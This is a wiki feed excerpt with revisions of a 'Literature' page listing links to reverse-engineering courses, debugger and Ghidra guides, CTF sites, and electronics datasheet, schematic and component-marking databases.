These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3268</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3268"/>
		<updated>2026-01-24T10:35:20Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add dork pdf search term ru espec forum&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
